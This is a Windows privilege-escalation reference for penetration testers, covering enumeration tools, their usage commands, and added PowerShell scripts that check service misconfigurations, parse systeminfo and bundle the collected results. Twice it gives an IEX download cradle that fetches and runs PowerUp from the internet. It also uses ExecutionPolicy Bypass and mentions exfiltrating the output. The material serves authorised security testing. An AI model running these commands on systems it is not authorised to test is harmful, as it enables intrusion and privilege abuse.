Tools

1. Tools Overview

This document provides an organized overview of enumeration and exploitation tools used for privilege escalation on Windows systems.

1.1 Enumeration Tools

These tools are essential for identifying vulnerabilities and misconfigurations that could lead to privilege escalation.

Tool: Description

PowerSploit's PowerUp: PowerShell script for identifying and exploiting local privilege escalation vulnerabilities (service misconfigurations, DLL hijacks, registry autoruns, AlwaysInstallElevated and similar).
Watson: C# tool that enumerates missing KBs on a Windows host and suggests matching privilege escalation exploits; the successor to the deprecated Sherlock script.
Sherlock (Deprecated): PowerShell script for identifying missing patches that could allow privilege escalation.
BeRoot: Cross-platform tool for privilege escalation checks on Windows, Linux and macOS.
Windows Exploit Suggester (WES): Python script that compares a system's patch level (taken from systeminfo output) against the Microsoft security bulletin spreadsheet and suggests potential exploits. No longer maintained, because Microsoft stopped publishing the spreadsheet it depends on; see WES-NG below.
WindowsEnum: PowerShell script for privilege escalation enumeration on Windows.
Seatbelt: C# project that collects security-relevant host configuration and operational data from Windows systems, useful both offensively and defensively.
Powerless: Batch script for privilege escalation enumeration on legacy Windows hosts where PowerShell is unavailable.
JAWS (Just Another Windows Enum Script): PowerShell script for comprehensive Windows enumeration.
winPEAS: Executable (with a batch variant for hosts without .NET) that searches for privilege escalation vectors on Windows.
Windows Exploit Suggester - Next Generation (WES-NG): Python rewrite of WES that uses a maintained vulnerability definition set, so it works for current Windows versions.
PrivescCheck: PowerShell script for checking common privilege escalation vectors on Windows systems.
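To make concrete what the tools above actually look for, here is a hand-rolled version of two checks that PowerUp, winPEAS and PrivescCheck all perform: unquoted service paths whose search-order candidates land in a directory the current user can write to, and service binaries (or their directories) writable by the current user. This is an added example written for this page, not code taken from any of those projects; it assumes it is run as the low-privileged user being assessed, reads ACLs only, and ignores Deny ACEs for brevity.

```powershell
# Added example, not code from PowerUp, winPEAS or PrivescCheck: hand-rolled service
# misconfiguration checks so the reader can see what the tools are looking for.
# Run as the low-privileged user being assessed; it only reads ACLs and changes nothing.

function Get-ServiceBinaryPath {
    # Strip quotes and arguments from a service ImagePath. Assumption: a quoted path ends
    # at the closing quote and an unquoted one at the first ".exe", which is also how the
    # service control manager resolves it.
    param([string]$ImagePath)
    if ($ImagePath -match '^"([^"]+)"') { return $Matches[1] }
    if ($ImagePath -match '^(.+?\.exe)') { return $Matches[1] }
    return $ImagePath
}

function Test-PathWritable {
    # True if an Allow ACE on $Path grants write rights to the current user or one of its
    # token groups. Deny ACEs are ignored for brevity (the real tools are more careful).
    param([string]$Path)
    if ([string]::IsNullOrEmpty($Path) -or -not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path } catch { return $false }
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                       [System.Security.AccessControl.FileSystemRights]::Write -bor
                       [System.Security.AccessControl.FileSystemRights]::Modify -bor
                       [System.Security.AccessControl.FileSystemRights]::FullControl)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # unresolvable (orphaned) identity, skip it
        if (($sids -contains $sid) -and ((([int]($ace.FileSystemRights)) -band $writeMask) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Get-HijackCandidate {
    # For an unquoted path containing spaces, list the executables the service control
    # manager tries before the real one (C:\Program.exe, C:\Program Files\My.exe, ...)
    # whose directory the current user can write to.
    param([string]$BinaryPath)
    $parts = $BinaryPath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
        $dir = Split-Path -Path $candidate -Parent
        if ($dir -and (Test-PathWritable -Path $dir)) { $candidate }
    }
}

function Find-ServiceMisconfiguration {
    # Walk every installed service and report the two findings as objects.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $image = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($image)) { continue }
        $bin = Get-ServiceBinaryPath -ImagePath $image
        $findings = @()
        if ($image -notmatch '^"' -and $bin -match ' ') {
            $hijack = @(Get-HijackCandidate -BinaryPath $bin)
            if ($hijack.Count -gt 0) { $findings += 'UnquotedPath(' + ($hijack -join ';') + ')' }
        }
        if (Test-PathWritable -Path $bin) {
            $findings += 'WritableBinary'
        } elseif (Test-PathWritable -Path (Split-Path -Path $bin -Parent)) {
            $findings += 'WritableBinaryDir'
        }
        if ($findings.Count -gt 0) {
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName
                ImagePath = $image
                Finding   = ($findings -join ', ')
            }
        }
    }
}

Find-ServiceMisconfiguration | Format-Table -AutoSize -Wrap
```

A finding is only interesting if the service runs as a privileged account (the RunsAs column, typically LocalSystem) and can be restarted by the current user or will restart on reboot; the real tools add those checks, and an unquoted path whose intermediate directories are not writable is not exploitable at all, which is why the example reports only candidates with a writable parent.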


2. Privilege Escalation Techniques

2.1 Enumeration Tools: Usage Instructions

The following section details how to use specific enumeration tools to gather system information and identify potential vulnerabilities.


PowerSploit's PowerUp

Usage (load the script into the current session, then run every check):

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

Downloading with IEX executes whatever the URL serves at that moment, so on an engagement host a reviewed copy of PowerUp.ps1 on infrastructure you control, or copy the file to the target and dot-source it (. .\PowerUp.ps1) instead. Invoke-AllChecks reports each finding together with the PowerUp function that abuses it (for example Invoke-ServiceAbuse for a modifiable service).

Watson

Usage: build the project (Visual Studio) against the .NET Framework version present on the target, then run Watson.exe on the host. It reads the OS build and installed KBs and lists the privilege escalation CVEs whose patches are missing, with links to public exploits.


Windows Exploit Suggester

Initial Steps (systeminfo is run on the target; the suggester runs anywhere Python is available):

systeminfo > systeminfo.txt
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt

--update writes the bulletin spreadsheet to the working directory, named after the download date; pass that file name to --database. Because Microsoft no longer publishes the spreadsheet, the original WES cannot know about anything newer than the last copy it downloaded; use WES-NG for current systems.

Seatbelt

Full Security Check:

Seatbelt.exe -group=all -full

winPEAS

Usage: copy the build matching the target architecture (winPEASx64.exe, winPEASx86.exe or winPEASany.exe; winPEAS.bat for hosts without .NET) to the target and run it, redirecting the output to a file:

.\winPEASx64.exe notcolor > winpeas.txt


2.2 Additional Enumeration Tools

The tools below also enumerate rather than exploit: each reports candidate vectors, and exploitation is a separate step, either with PowerUp's Invoke-* functions or with a standalone exploit for a missing patch.


BeRoot

Usage: run the Windows build (beRoot.exe) on the target; it prints the results of its checks without further interaction.


PrivescCheck

Usage (PrivescCheck.ps1 only defines functions, so it must be dot-sourced into the session before Invoke-PrivescCheck is called; running it with -File alone produces no output):

powershell -ExecutionPolicy Bypass -Command ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
powershell -ExecutionPolicy Bypass -Command ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_Report -Format TXT,HTML"

-Extended adds the slower, noisier checks; -Report with -Format writes the findings to files (TXT, CSV, HTML and XML are supported) instead of only the console.

JAWS

Usage:

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

Windows Exploit Suggester - Next Generation (WES-NG)

Usage (wes.py runs on the attacker's machine; only the systeminfo output comes from the target):

python3 wes.py --update
python3 wes.py systeminfo.txt
python3 wes.py systeminfo.txt --impact "Elevation of Privilege" --exploits-only

--update fetches the current definitions; the third command narrows the usually long output to privilege escalation issues for which a public exploit is known.
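What a suggester extracts from systeminfo.txt is small: the OS version, the build number and the list of installed KBs, which it then compares with the patches expected for that build. The following PowerShell is an added example written for this page, not WES-NG's own code; it parses that file into those facts, diffs the KB list against a required set, and shows how to gather the same facts live with CIM when systeminfo is unavailable. The sample systeminfo text and the KB numbers in it are constructed for the example and carry no real vulnerability information.

```powershell
# Added example, not WES-NG's own code: parse the systeminfo.txt that wes.py consumes into
# the facts a suggester needs and diff the installed KBs against a required list.
# Sample text and KB numbers below are constructed placeholders.

function ConvertFrom-SystemInfo {
    # Returns an object with OSName, Version, Build, Architecture and Hotfixes (KB list).
    param([string[]]$Lines)
    $info = [ordered]@{ OSName = $null; Version = $null; Build = $null; Architecture = $null; Hotfixes = @() }
    foreach ($line in $Lines) {
        switch -Regex ($line) {
            '^OS Name:\s+(.+?)\s*$'                       { $info.OSName = $Matches[1] }
            '^OS Version:\s+(\d+\.\d+\.\d+).*Build (\d+)' { $info.Version = $Matches[1]; $info.Build = [int]$Matches[2] }
            '^System Type:\s+(\S+)'                       { $info.Architecture = $Matches[1] }
            '^\s+\[\d+\]:\s+(KB\d+)'                      { $info.Hotfixes += $Matches[1] }
        }
    }
    [pscustomobject]$info
}

function Get-MissingKB {
    # KBs in $Required that are absent from $Installed. A real suggester derives $Required
    # from its definitions for that exact build; here it is a constructed list.
    param([string[]]$Installed, [string[]]$Required)
    $Required | Where-Object { $Installed -notcontains $_ }
}

function Get-LiveSystemInfo {
    # The same facts gathered directly with CIM, in the same shape as ConvertFrom-SystemInfo.
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    [pscustomobject]@{
        OSName       = $os.Caption
        Version      = $os.Version
        Build        = [int]$os.BuildNumber
        Architecture = $os.OSArchitecture
        Hotfixes     = @(Get-CimInstance -ClassName Win32_QuickFixEngineering | ForEach-Object { $_.HotFixID })
    }
}

# Constructed sample in the shape systeminfo produces on an English Windows 10 host.
$sampleSystemInfo = @'
Host Name:                 WS01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB9990001
                           [02]: KB9990002
                           [03]: KB9990003
'@ -split "`r?`n"

$parsed = ConvertFrom-SystemInfo -Lines $sampleSystemInfo
$parsed | Format-List

# Constructed placeholder list of KBs "required" for this build.
$requiredForBuild = 'KB9990002', 'KB9990004'
Get-MissingKB -Installed $parsed.Hotfixes -Required $requiredForBuild
```

For a real file use ConvertFrom-SystemInfo -Lines (Get-Content .\systeminfo.txt). The labels matched by the regexes are those of an English systeminfo; on a localised host the labels differ, which is one reason to capture the CIM data as well.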

3. Usage Instructions

3.1 Initial System Information Gathering

Begin by collecting essential system information for analysis and exploitation strategy development:

systeminfo > systeminfo.txt

3.2 Updating and Running Windows Exploit Suggester

Update the Windows Exploit Suggester database and analyze the collected system information:

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt

Replace the database file name with the one --update actually wrote; the original WES requires both --database and --systeminfo and does not accept a bare systeminfo.txt argument.

3.3 Running Seatbelt for a Comprehensive Check

Conduct a full security audit using Seatbelt:

Seatbelt.exe -group=all -full -outputfile="C:\Temp\seatbelt_report.txt"

3.4 Executing PowerUp

Scan for privilege escalation vulnerabilities using PowerUp (the first line loads the script, the second runs every check):

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks
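The four steps above as one collection run, as an added example that is not part of PowerSploit, Seatbelt or this page: every artefact lands in a timestamped directory with a transcript and SHA-256 hashes, so nothing is lost if the shell dies half-way and the evidence can be verified later. It assumes Seatbelt.exe and a reviewed copy of PowerUp.ps1 have already been staged in $ToolDir (no download from the internet) and that the current user can write to $OutRoot; both paths are illustrative defaults.

```powershell
# Added example, not part of PowerSploit, Seatbelt or this page: run the collection steps
# in one go. Assumes Seatbelt.exe and PowerUp.ps1 are already staged in $ToolDir.

function Invoke-PrivescCollection {
    param(
        [string]$ToolDir = 'C:\Temp\tools',   # illustrative default
        [string]$OutRoot = 'C:\Temp'          # illustrative default
    )
    $stamp  = Get-Date -Format 'yyyyMMdd-HHmmss'
    $outDir = Join-Path $OutRoot "privesc-$env:COMPUTERNAME-$stamp"
    New-Item -ItemType Directory -Path $outDir -Force | Out-Null
    Start-Transcript -Path (Join-Path $outDir 'transcript.txt') | Out-Null
    try {
        # 3.1: systeminfo output is what the exploit suggesters parse later.
        systeminfo | Out-File -FilePath (Join-Path $outDir 'systeminfo.txt') -Encoding utf8

        # 3.3: Seatbelt, only if the binary was staged.
        $seatbelt = Join-Path $ToolDir 'Seatbelt.exe'
        if (Test-Path $seatbelt) {
            & $seatbelt -group=all -full "-outputfile=$(Join-Path $outDir 'seatbelt_report.txt')"
        } else {
            Write-Warning "Seatbelt.exe not found in $ToolDir, skipping"
        }

        # 3.4: dot-source the local PowerUp copy, then run every check.
        $powerUp = Join-Path $ToolDir 'PowerUp.ps1'
        if (Test-Path $powerUp) {
            . $powerUp
            Invoke-AllChecks | Out-File -FilePath (Join-Path $outDir 'powerup.txt') -Encoding utf8
        } else {
            Write-Warning "PowerUp.ps1 not found in $ToolDir, skipping"
        }
    } finally {
        Stop-Transcript | Out-Null
    }
    # Hash every artefact; compute first, then write, so the hash file is not hashed itself.
    $hashes = Get-ChildItem -Path $outDir -File | Get-FileHash -Algorithm SHA256 | Select-Object Hash, Path
    $hashes | Export-Csv -Path (Join-Path $outDir 'hashes.csv') -NoTypeInformation
    $outDir
}

Invoke-PrivescCollection
```

The function returns the output directory so it can be zipped and exfiltrated in one step; the transcript also records any tool that was skipped, which matters when the report has to state what was and was not checked.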
